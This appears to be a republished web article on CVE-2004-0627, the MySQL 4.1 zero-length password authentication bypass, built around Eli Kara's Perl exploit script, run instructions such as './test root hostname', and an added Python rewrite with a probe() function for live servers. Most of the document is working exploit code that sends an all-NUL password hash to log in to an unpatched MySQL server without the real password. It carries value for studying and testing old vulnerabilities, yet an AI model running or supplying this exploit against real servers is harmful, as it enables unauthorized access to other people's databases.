Use a zero-length password to bypass MySQL Authentication

Source: Internet
Author: User
Tags: perl script

An old article from www.2cto.com that has not been reposted before.

A client that sends a specially crafted authentication packet can bypass the database's password check. This is the zero-length scramble bug reported by NGSSecurity in 2004 (CVE-2004-0627), present in MySQL 4.1.x before 4.1.3 and in the 5.0 development releases of the time: the server's check_scramble_323 routine treated the client-supplied scramble as a NUL-terminated C string, so a scramble consisting of NUL bytes compared as an empty string and was accepted. The script below does not literally omit the password field; it declares a 20-byte password hash and fills it with NUL bytes, which is exactly what the vulnerable comparison reads as empty. The real password is never needed.

Note: the script needs a MySQL server that listens on TCP/IP (not one started with skip-networking or reachable only through its Unix socket), and the target account must be allowed to connect from the scanning host's IP address, otherwise the server refuses the connection before authentication starts.

The following test script checks a server for the vulnerability.
#!/usr/bin/perl
#
# The script connects to MySQL and attempts to log in using a zero-length password
# Based on the vuln found by NGSSecurity
#
# The following Perl script can be used to test your version of MySQL. It will display
# the login packet sent to the server and its reply.
#
# Exploit copyright (c) 2004 by Eli Kara, Beyond Security
# elik beyondsecurity com
#

use strict;
use IO::Socket::INET;

# <username> and <host> are required, [port] is optional
usage() unless (@ARGV >= 2 && @ARGV <= 3);

my $username = shift(@ARGV);
my $host = shift(@ARGV);
if (!$host)
{
    usage();
}
my $port = shift(@ARGV);
if (!$port)
{
    $port = 3306; print "Using default MySQL port (3306)\n";
}

# create the socket
my $socket = IO::Socket::INET->new(Proto => 'tcp', PeerAddr => $host, PeerPort => $port);
$socket or die "Cannot connect to host!\n";

# receive greeting (server handshake: protocol version, version string, scramble, ...)
my $reply;
recv($socket, $reply, 1024, 0);
if (length($reply) < 7)
{
    print "Not allowed to connect to MySQL!\n";
    exit(1);
}
print "Received greeting:\n";
HexDump($reply);
print "\n";

# here we define the login OK reply
#my $login_OK = "\x01\x00\x00\x02\xFE";

# break the username string into chars and rebuild it (plain byte string)
my $binuser = pack("C*", unpack("C*", $username));

# Build the 4.1 client authentication packet. Layout: 4-byte capability flags,
# 4-byte max packet size, 1-byte charset, 23 bytes of filler, the NUL-terminated
# username, then a one-byte password hash length (0x14 = 20) followed by 20 NUL
# bytes in place of a real scramble. The vulnerable server reads the all-NUL
# scramble as an empty string and accepts it.
my $packet = "\x85\xa6\x03\x00".      # capabilities 0x0003a685 (incl. PROTOCOL_41, SECURE_CONNECTION)
    "\x00\x00\x00\x01".               # max packet size
    "\x08".                           # charset (latin1)
    ("\x00" x 23).                    # filler
    $binuser."\x00".                  # username + NUL
    "\x14".("\x00" x 20);             # hash length (20) + NULL hash
# MySQL packet header: 3-byte little-endian payload length + packet number (1)
substr($packet, 0, 0) = substr(pack("V", length($packet)), 0, 3)."\x01";
print "Sending caps packet:\n";
HexDump($packet);
print "\n";
send($socket, $packet, 0);

# receive reply
recv($socket, $reply, 1024, 0);
print "Received reply:\n";
HexDump($reply);

my @list_bytes = unpack("C*", $reply);
#print "The 5th byte is: ", $list_bytes[4], "\n";
# need at least the 4-byte header plus the first payload byte
if (@list_bytes < 5)
{
    print "Response insufficient\n";
    exit(1);
}

# byte 4 is the first payload byte: 0x00 = OK packet, 0xFE = EOF-style OK, 0xFF = error
#if ($reply eq $login_OK)
if ($list_bytes[4] == 0 || $list_bytes[4] == 254)
{
    print "Received OK reply, authentication successful!!\n";
}
else
{
    print "Authentication failed!\n";
}

# close
close($socket);

sub usage
{
    # print usage information
    print "\nUsage: mysql_auth_bypass_zeropass.pl <username> <host> [port]\n\n".
          "<username> - The DB username to authenticate\n".
          "<host>     - The host to connect\n".
          "[port]     - The TCP port which MySQL is listening on (optional, default is 3306)\n";
    exit(1);
}

###
# Do a hexdump of a string (assuming it's binary)
###
sub HexDump
{
    my $buffer = $_[0];
    # unpack it into chars
    my @up = unpack("C*", $buffer);
    my $pos = 0;
    # calculate matrix sizes
    my $rows = int(@up/16);
    my $leftover = int(@up%16);

    for (my $row = 0; $row < $rows; $row++, $pos += 16)
    {
        printf("%08X\t", $pos);
        my @values = @up[$pos..$pos+15];
        my @line;
        foreach my $val (@values)
        {
            push(@line, sprintf("%02X", $val));
        }
        print join(' ', @line), "\n";
    }

    # print last (partial) line, if any
    if ($leftover)
    {
        printf("%08X\t", $pos);
        my @values = @up[$pos..$pos+$leftover-1];
        my @line;
        foreach my $val (@values)
        {
            push(@line, sprintf("%02X", $val));
        }
        print join(' ', @line), "\n";
    }
}

# milw0rm.com [2004-07-10]
 
Since the script is written in Perl, the system needs a Perl interpreter installed, and the interpreter path on the script's first line (/usr/bin/perl) must exist.
To run it: save the script as test, make it executable with chmod +x test, then invoke it with the database user name and the target host (and optionally the port), for example:
# ./test root hostname
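The Perl script above performs the whole exchange in one pass and only looks at the fifth byte of the reply. As an added example that is not part of the original page or Eli Kara's script, the Python below splits the same exchange into a greeting parser, a login-packet builder that produces the same bytes as the script (capabilities 0x0003a685, the 23-byte filler, the 0x14 length byte and the all-NUL hash), and a reply classifier that also decodes error packets, so each step can be checked offline against constructed packets. The packet layout follows the public MySQL client/server protocol (HandshakeV10 / HandshakeResponse41); the constant and function names, the sample greeting and the sample replies are assumptions made for this example, and probe() is only a convenience wrapper for a live server.

```python
"""Added example, not from the original page or Eli Kara's script: the MySQL 4.1
login exchange split into a greeting parser, a login-packet builder and a reply
classifier. Layout per the public MySQL protocol (HandshakeV10 / HandshakeResponse41).
All sample bytes below are constructed for illustration, not captured traffic."""
import socket
import struct

CLIENT_CAPS = 0x0003A685          # same capability flags the Perl script sends
CLIENT_SECURE_CONNECTION = 0x8000
MAX_PACKET = 0x01000000
CHARSET_LATIN1 = 8
SCRAMBLE_LEN = 20


def frame(payload, seq):
    """Prefix a payload with the 3-byte little-endian length and the sequence id."""
    return struct.pack("<I", len(payload))[:3] + bytes([seq]) + payload


def unframe(pkt):
    """Return (seq, payload) or raise ValueError on a short or truncated packet."""
    if len(pkt) < 4:
        raise ValueError("packet shorter than the 4-byte header")
    length = struct.unpack("<I", pkt[:3] + b"\x00")[0]
    payload = pkt[4:4 + length]
    if len(payload) != length:
        raise ValueError("truncated packet: header says %d, got %d" % (length, len(payload)))
    return pkt[3], payload


def parse_greeting(pkt):
    """Parse a HandshakeV10 server greeting into its fields."""
    _, p = unframe(pkt)
    if p[0] != 10:
        raise ValueError("unexpected protocol version %d" % p[0])
    end = p.index(b"\x00", 1)                      # server version is NUL-terminated
    version = p[1:end].decode("latin-1")
    pos = end + 1
    thread_id = struct.unpack_from("<I", p, pos)[0]; pos += 4
    scramble = p[pos:pos + 8]; pos += 8 + 1        # first 8 scramble bytes + NUL filler
    caps = struct.unpack_from("<H", p, pos)[0]; pos += 2
    charset = p[pos]; pos += 1
    status = struct.unpack_from("<H", p, pos)[0]; pos += 2
    caps |= struct.unpack_from("<H", p, pos)[0] << 16; pos += 2
    pos += 1 + 10                                  # auth-data length byte + reserved
    if caps & CLIENT_SECURE_CONNECTION:
        scramble += p[pos:pos + 12]                # remaining 12 scramble bytes (then NUL)
    return {"server_version": version, "thread_id": thread_id, "capabilities": caps,
            "charset": charset, "status": status, "scramble": scramble}


def build_login_packet(username, auth_response=b"\x00" * SCRAMBLE_LEN, seq=1):
    """HandshakeResponse41 with the username and, by default, an all-NUL 20-byte hash.
    This is the Perl script's packet byte for byte; a real client would put the
    SHA1-based scramble output in auth_response instead."""
    if b"\x00" in username:
        raise ValueError("username must not contain NUL")
    payload = (struct.pack("<II", CLIENT_CAPS, MAX_PACKET) + bytes([CHARSET_LATIN1])
               + b"\x00" * 23 + username + b"\x00"
               + bytes([len(auth_response)]) + auth_response)
    return frame(payload, seq)


def classify_reply(pkt):
    """Map the server's reply to 'ok', 'error <code>: <msg>', 'short' or 'unknown'."""
    try:
        _, p = unframe(pkt)
    except ValueError:
        return "short"
    if not p:
        return "short"
    if p[0] in (0x00, 0xFE):                       # OK packet; the Perl script also accepts 0xFE
        return "ok"
    if p[0] == 0xFF and len(p) >= 3:               # ERR packet: code, optional '#SQLSTATE', message
        code = struct.unpack_from("<H", p, 1)[0]
        msg = p[3:]
        if msg[:1] == b"#":
            msg = msg[6:]
        return "error %d: %s" % (code, msg.decode("latin-1"))
    return "unknown 0x%02x" % p[0]


def probe(host, port=3306, username=b"root", timeout=5.0):
    """Run the exchange against a live server; returns (greeting fields, verdict)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        greeting = parse_greeting(s.recv(1024))
        s.sendall(build_login_packet(username))
        return greeting, classify_reply(s.recv(1024))


# Constructed sample traffic (assumed values, not captured from a real server).
_SERVER_CAPS = 0xA20C                              # includes CLIENT_SECURE_CONNECTION
SAMPLE_GREETING = frame(
    b"\x0a" + b"4.1.2-alpha\x00" + struct.pack("<I", 7) + b"ABCDEFGH" + b"\x00"
    + struct.pack("<H", _SERVER_CAPS & 0xFFFF) + bytes([CHARSET_LATIN1]) + struct.pack("<H", 2)
    + struct.pack("<H", _SERVER_CAPS >> 16) + b"\x00" + b"\x00" * 10 + b"IJKLMNOPQRST" + b"\x00", 0)
SAMPLE_OK = frame(b"\x00\x00\x00\x02\x00\x00\x00", 2)
SAMPLE_ERR = frame(b"\xff" + struct.pack("<H", 1045) + b"#28000"
                   + b"Access denied for user 'root'@'10.0.0.5' (using password: YES)", 2)

if __name__ == "__main__":
    print(parse_greeting(SAMPLE_GREETING))
    print(build_login_packet(b"root").hex())
    print(classify_reply(SAMPLE_OK), "|", classify_reply(SAMPLE_ERR))
```

Against a patched server (4.1.3 or later) the verdict is an "error 1045: Access denied ..." string, which is the correct behaviour; a verdict of "ok" corresponds to the Perl script's "authentication successful" branch. Decoding the error packet is worth the extra lines: a 1045 tells you the server reached the password check and rejected the NUL scramble, while a 1130 ("Host ... is not allowed to connect") means the grant tables blocked the client before authentication, which the Perl script would report with the same "Authentication failed!" line.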
